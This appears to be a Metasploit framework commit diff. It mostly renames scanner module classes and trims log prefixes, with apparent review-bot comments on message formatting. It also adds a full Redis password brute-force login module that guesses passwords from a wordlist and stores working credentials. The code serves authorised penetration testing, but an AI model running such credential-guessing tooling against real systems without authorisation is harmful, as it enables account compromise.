@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index e3ba450180..9c936d3938 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index c3a0442d33..e06bac1f7b 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index b733440c72..19935590ea 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Nmap diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index a61284d5fd..a670e1eb02 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 7b24a42b36..d953f819a9 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 3b740f7643..389baf3385 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 3bd78c1437..4450a690bb 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index aab795941c..30e5c76522 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index c07928617e..fae6c4f40c 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 8fe5687b47..4e7ff072d0 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index d787bf7863..b442daa78d 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index ab83d9191d..348bf2354c 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 693c294945..e70063ed56 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index 98ae8f9257..b869bea541 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/pop3' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index ff3d1828c2..f2d1d45f4f 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index abc7f8ca76..b3e4fd2d44 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index e020120a0e..d6b5df3200 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index d84256ff30..ddd058497e 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Order is important here include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index b59ee5c028..2455423ec4 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 299c1210af..857d61f11e 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 8f64a84695..a09a65cc48 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb index 9e48bfc0ec..12c8177688 100644 --- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb +++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb 
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index a4c3066cfb..ddbf1a926b 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 9c2d96dc71..5c5bf308d3 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/postgres' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index b42313a194..59915acedc 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 8a2bea7d9c..d8e6036db0 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb 
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_delete_file.rb b/modules/auxiliary/scanner/printer/printer_delete_file.rb index 4b561b4877..6dc859651d 100644 --- a/modules/auxiliary/scanner/printer/printer_delete_file.rb +++ b/modules/auxiliary/scanner/printer/printer_delete_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 64c04d999d..4e4f2293e7 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index c1546ccb66..884764477b 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 49f70ec717..068705657a 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb 
@@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index d596504844..4d6e01235e 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 610a1f6bb4..10445e7ffd 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_upload_file.rb b/modules/auxiliary/scanner/printer/printer_upload_file.rb index 3f0fe0229e..3971e8b1cf 100644 --- a/modules/auxiliary/scanner/printer/printer_upload_file.rb +++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index 5171a46a3c..d23312a60e 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb 
@@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/quake/server_info.rb b/modules/auxiliary/scanner/quake/server_info.rb index f8012e7a4c..f0a4e2b0e4 100644 --- a/modules/auxiliary/scanner/quake/server_info.rb +++ b/modules/auxiliary/scanner/quake/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/quake' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Quake diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index d9fca848d7..18edd5f1e8 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) ], self.class) end def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} Verifying RDP protocol...") + vprint_status("Verifying RDP protocol...") # send connection sock.put(connection_request) @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp_vuln # check if rdp is open unless check_rdp - vprint_status "#{peer} Could not connect to RDP." + vprint_status "Could not connect to RDP." return Exploit::CheckCode::Unknown end diff --git a/modules/auxiliary/scanner/redis/file_upload.rb b/modules/auxiliary/scanner/redis/file_upload.rb index 3842aea864..fcdf313df9 100644 --- a/modules/auxiliary/scanner/redis/file_upload.rb 
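Review bot: The messages in check_rdp and check_rdp_vuln no longer name the target once `#{peer}` is dropped from `vprint_status("Verifying RDP protocol...")` and `vprint_status "Could not connect to RDP."`. Presumably the print helpers now prefix the peer themselves, but that change is not visible in this part of the diff; it is worth confirming, because output from a threaded scan over a range cannot otherwise be attributed to a host. The same question applies to the redis_server.rb, rsync/modules_list.rb and sap_mgmt_con_brute_login.rb hunks further down. Separately, the port option could use the shared helper, `Opt::RPORT(3389)`, rather than spelling out `OptPort.new('RPORT', ...)`. Both method bodies continue outside their hunks.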
+++ b/modules/auxiliary/scanner/redis/file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Redis def initialize(info = {}) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb new file mode 100644 index 0000000000..3c20561c86 --- /dev/null +++ b/modules/auxiliary/scanner/redis/redis_login.rb 
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'metasploit/framework/login_scanner/redis'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Redis
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Redis Login Utility',
+ 'Description' => 'This module attempts to authenticate to an REDIS service.',
+ 'Author' => [ 'Nixawk' ],
+ 'References' => [
+ ['URL', 'http://redis.io/topics/protocol']
+ ],
+ 'License' => MSF_LICENSE))
+
+ register_options(
+ [
+ OptPath.new('PASS_FILE',
+ [
+ false,
+ 'The file that contains a list of of probable passwords.',
+ File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
+ ])
+ ], self.class)
+
+ # redis does not have an username, there's only password
+ deregister_options('USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS', 'DB_ALL_CREDS')
+ end
+
+ def run_host(ip)
+ cred_collection = Metasploit::Framework::CredentialCollection.new(
+ blank_passwords: datastore['BLANK_PASSWORDS'],
+ pass_file: datastore['PASS_FILE'],
+ password: datastore['PASSWORD'],
+ # The LoginScanner API refuses to run if there's no username, so we give it a fake one.
+ # But we will not be reporting this to the database.
+ username: 'redis'
+ )
+
+ cred_collection = prepend_db_passwords(cred_collection)
+
+ scanner = Metasploit::Framework::LoginScanner::Redis.new(
+ host: ip,
+ port: rport,
+ proxies: datastore['PROXIES'],
+ cred_details: cred_collection,
+ stop_on_success: datastore['STOP_ON_SUCCESS'],
+ connection_timeout: 30
+ )
+
+ scanner.scan!
do |result| + credential_data = result.to_h + credential_data.merge!( + module_fullname: self.fullname, + workspace_id: myworkspace_id + ) + + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL + credential_data.delete(:username) # This service uses no username + credential_core = create_credential(credential_data) + credential_data[:core] = credential_core + create_credential_login(credential_data) + + if datastore['VERBOSE'] + vprint_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential} (#{result.status}: #{result.proof})" + else + print_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential}" + end + when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED + vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + break + else + invalidate_login(credential_data) + vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + end + end + end +end diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 2d85876963..69d0405e61 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -5,14 +5,14 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Redis include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, - 'Name' => 'Redis Scanner', + 'Name' => 'Redis Command Execute Scanner', 'Description' => %q( This module locates Redis endpoints by attempting to run a specified Redis command. 
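Review bot: The `NO_AUTH_REQUIRED` branch in run_host reports a Redis instance that accepts commands without a password as `LOGIN FAILED`, and only through `vprint_error`, so a non-verbose run prints nothing for the finding an auditor most needs to see. Print it unconditionally and name it for what it is, for example `print_status "#{peer} - No authentication required"` before the `break`. The module also still builds `#{peer} - ` into every message while the other hunks in this commit strip that prefix, so if the print helpers now add it the target would be shown twice. Two user-facing strings carry typos: `list of of probable passwords` and `an REDIS service`.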
@@ -33,15 +33,15 @@ class Metasploit3 < Msf::Auxiliary end def run_host(_ip) - vprint_status("#{peer} -- contacting redis") + vprint_status("Contacting redis") begin connect return unless (data = redis_command(command)) report_service(host: rhost, port: rport, name: "redis server", info: "#{command} response: #{data}") - print_good("#{peer} -- found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") + print_good("Found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::Errno::ETIMEDOUT => e - vprint_error("#{peer} -- error while communicating: #{e}") + vprint_error("Error while communicating: #{e}") ensure disconnect end diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index 4293d6bc1e..9b8dbe95d7 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index 9e2b9cf3ec..6c50275f34 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index f2a93ecf5a..9a1e4d7c83 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 7d1414a6d6..1ef454e273 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 8892b023d5..aac1d57444 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 37584933e1..ff68f8f088 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary elsif res =~ /^#{RSYNC_HEADER} OK$/ 'not required' else - vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}") + vprint_error("unexpected response when connecting to #{rmodule}: #{res}") "unexpected response '#{res}'" end else - vprint_error("#{peer} - no response when connecting to #{rmodule}") + vprint_error("no response when connecting to #{rmodule}") 'no response' end end 
@@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary end unless version - vprint_error("#{peer} - no rsync negotiation found") + vprint_error("no rsync negotiation found") return end @@ -149,12 +149,12 @@ class Metasploit3 < Msf::Auxiliary connect version, motd = rsync_negotiate unless version - vprint_error("#{peer} - does not appear to be rsync") + vprint_error("does not appear to be rsync") disconnect return end rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while connecting and negotiating: #{e}") + vprint_error("error while connecting and negotiating: #{e}") disconnect return end @@ -168,24 +168,24 @@ class Metasploit3 < Msf::Auxiliary name: 'rsync', info: info ) - print_status("#{peer} - rsync version: #{version}") if datastore['SHOW_VERSION'] - print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] + print_status("rsync version: #{version}") if datastore['SHOW_VERSION'] + print_status("rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] modules_metadata = {} begin modules_metadata = rsync_list rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} -- error while listing modules: #{e}") + vprint_error("Error while listing modules: #{e}") return ensure disconnect end if modules_metadata.empty? - print_status("#{peer} - no rsync modules found") + print_status("no rsync modules found") else modules = modules_metadata.map { |m| m[:name] } - print_good("#{peer} - #{modules.size} rsync modules found: #{modules.join(', ')}") + print_good("#{modules.size} rsync modules found: #{modules.join(', ')}") table_columns = %w(Name Comment) if datastore['TEST_AUTHENTICATION'] 
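Review bot: Message capitalisation is inconsistent in the last hunk on this line: `vprint_error("Error while listing modules: #{e}")` starts with a capital, while every other message this commit touches in modules_list.rb is lower-case (`error while connecting and negotiating`, `no rsync modules found`). `vprint_error("error while listing modules: #{e}")` would match the rest of the file. The enclosing method starts and ends outside the hunk.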
